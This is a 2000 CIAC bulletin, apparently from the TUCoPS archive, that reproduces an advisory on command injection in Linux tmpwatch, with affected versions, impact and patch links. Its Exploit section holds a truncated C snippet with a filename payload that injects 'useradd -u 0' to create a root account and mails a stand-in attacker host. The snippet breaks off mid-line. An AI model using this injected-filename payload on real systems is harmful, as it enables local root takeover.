Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Linux :: General :: ciacl005.htm

Linux 'tmpwatch' Vulnerability



Linux 'tmpwatch' Vulnerability Privacy and Legal Notice

CIAC INFORMATION BULLETIN

L-005: Linux 'tmpwatch' Vulnerability

October 16, 2000 16:00 GMT
PROBLEM:       The tmpwatch utility has a flaw in the execution of the
               system() library subroutine.
PLATFORM:      Red Hat Linux 7.0 (tmpwatch v2.5.1)
               Red Hat Linux 6.2 (tmpwatch v2.2)
               Conectiva 4.0, 4.0es, 4.1, 4.2, 5.0, prg gráficos, ecommerce, 5.1
               Trustix Secure Linux
               Mandrake 6.0, 6.1, 7.0, 7.1
               Immunix OS 6.2
DAMAGE:        Through the use of arbitrary commands to the system() library
               a local user account could gain root. By creating
               layers of subdirectories in a subdirectory monitored by
               tmpwatch, a local user could fill the system process
               table. This would cause a denial of service to the system
               requiring a hard reboot.
SOLUTION:      Apply the patches specified in the advisory.

VULNERABILITY The risk is MEDIUM. The advisory has been publicly discussed, ASSESSMENT: with exploit code given.
[****** Begin SecuriTeam Advisory ******] Insecure call of external programs in tmpwatch ------------------------------------------------------------------------ SUMMARY The tmpwatch utility is used in Red Hat Linux to remove temporary files. This utility has an option to call the "fuser" program, which verifies if a file is currently opened by a process. The fuser program is invoked within tmpwatch by calling the system() library subroutine. Insecure handling of the arguments to this subroutine could potentially allow an attacker to execute arbitrary commands. DETAILS Affected Versions: Red Hat Linux 7.0 (tmpwatch v2.5.1) Red Hat Linux 6.2 (tmpwatch v2.2) Conectiva 4.0, 4.0es, 4.1, 4.2, 5.0, prg gráficos, ecommerce, 5.1 Trustix Secure Linux Mandrake 6.0, 6.1, 7.0, 7.1 Immunix OS 6.2 Immune Versions: SuSE Impact: This vulnerability may allow local attackers to compromise superuser access if the administrator in a non-default manner uses tmpwatch. The tmpwatch tool removes files that have not been modified or accessed within a specified amount of time. It was designed to securely remove files by avoiding typical race condition vulnerabilities. System administrators usually run this tool periodically to remove old temporary files in world-writeable directories. The tmpwatch tool uses the --fuser or -s options to avoid removing a file that is in an open state in another process. This option uses the system() library subroutine to call the external program /sbin/fuser with the file name being examined as an argument. The system() subroutine spawns a shell to execute the command. An attacker may create a file name containing shell metacharacters, which could allow them to execute arbitrary commands if tmpwatch with the fuser option is used to remove the file. Source code comparison between the Red Hat Linux 6.2 and 7.0 tmpwatch packages suggests this vulnerability was recognized and a fix was attempted. However, the fix is incorrect, and the vulnerability is still exploitable. Exploit: 1. Compile and run: #include int main() { FILE *f; char filename[100] = ";useradd -u 0 -g 0 haks0r;mail haks0r@somehost.comRecommendations: Do not use the --fuser or -s options with tmpwatch. Red Hat has issued the following RPMs that contain fixes for this vulnerability. Red Hat Linux 6.2: Alpha: ftp://updates.redhat.com/6.2/alpha/tmpwatch-2.6.2-1.6.2.alpha.rpm Sparc: ftp://updates.redhat.com/6.2/sparc/tmpwatch-2.6.2-1.6.2.sparc.rpm i386: ftp://updates.redhat.com/6.2/i386/tmpwatch-2.6.2-1.6.2.i386.rpm Sources: ftp://updates.redhat.com/6.2/SRPMS/tmpwatch-2.6.2-1.6.2.src.rpm Red Hat Linux 7.0: i386: ftp://updates.redhat.com/7.0/i386/tmpwatch-2.6.2-1.7.i386.rpm Sources: ftp://updates.redhat.com/7.0/SRPMS/tmpwatch-2.6.2-1.7.src.rpm Conectiva: ftp://atualizacoes.conectiva.com.br/4.0/i386/tmpwatch-2.6.2-1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/tmpwatch-2.6.2-1cl.src.rpm ftp://atualizacoes.conectiva.com.br/4.0es/i386/tmpwatch-2.6.2-1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/tmpwatch-2.6.2-1cl.src.rpm ftp://atualizacoes.conectiva.com.br/4.1/i386/tmpwatch-2.6.2-1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/tmpwatch-2.6.2-1cl.src.rpm ftp://atualizacoes.conectiva.com.br/4.2/i386/tmpwatch-2.6.2-1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/tmpwatch-2.6.2-1cl.src.rpm ftp://atualizacoes.conectiva.com.br/5.0/i386/tmpwatch-2.6.2-1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/tmpwatch-2.6.2-1cl.src.rpm ftp://atualizacoes.conectiva.com.br/5.1/i386/tmpwatch-2.6.2-1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/tmpwatch-2.6.2-1cl.src.rpm ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/tmpwatch-2.6.2-1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/tmpwatch-2.6.2-1cl.src.rpm ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/tmpwatch-2.6.2-1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/tmpwatch-2.6.2-1cl.src.rpm Trustix Secure Linux: This file can be found at: http://www.trustix.net/download/Trustix/updates/1.1/RPMS/ Or ftp://ftp.trustix.com/pub/Trustix/updates/1.1/RPMS/ Mandrake: You can download the updates directly from: ftp://ftp.linux.tucows.com/pub/distributions/Mandrake/Mandrake/updates ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates Linux-Mandrake 6.0: 6.0/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm 6.0/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm Linux-Mandrake 6.1: 6.1/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm 6.1/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm Linux-Mandrake 7.0: 7.0/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm 7.0/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm Linux-Mandrake 7.1: 7.1/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm 7.1/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm Immunix OS 6.2: http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/tmpwatch-2.6.2-1.6.2_StackGuard.i386.rpm Or http://www.immunix.org:8080/ImmunixOS/6.2/updates/SRPMS/tmpwatch-2.6.2-1.6.2_StackGuard.src.rpm ADDITIONAL INFORMATION The information has been provided by xforce@ISS.NET X-Force, grange@RT.MIPT.RU Alexander Y. Yurchenko, tsl@TRUSTIX.COM TSL Team, draht@SUSE.DE Roman Drahtmueller, security@LINUX-MANDRAKE.COM Linux Mandrake Security Team, and greg@WIREX.COM" Greg KH. [****** End SecuriTeam Advisory ******] ======================================== DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

CIAC wishes to acknowledge the contributions of Beyond-Security's SecuriTeam for the information contained in this bulletin.
CIAC services are available to DOE, DOE Contractors, and the NIH. CIAC can be contacted at:
    Voice:          +1 925-422-8193 (7 x 24)
    FAX:            +1 925-423-8002
    STU-III:        +1 925-423-2604
    E-mail:          ciac@llnl.gov
    World Wide Web:  http://www.ciac.org/
                     http://ciac.llnl.gov
                     (same machine -- either one will work)
    Anonymous FTP:   ftp.ciac.org
                     ciac.llnl.gov
                     (same machine -- either one will work)

This document was prepared as an account of work sponsored by an agency of the United States Government. Neither the United States Government nor the University of California nor any of their employees, makes any warranty, express or implied, or assumes any legal liability or responsibility for the accuracy, completeness, or usefulness of any information, apparatus, product, or process disclosed, or represents that its use would not infringe privately owned rights. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not necessarily constitute or imply its endorsement, recommendation or favoring by the United States Government or the University of California. The views and opinions of authors expressed herein do not necessarily state or reflect those of the United States Government or the University of California, and shall not be used for advertising or product endorsement purposes.
UCRL-MI-119788
[Privacy and Legal Notice]


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH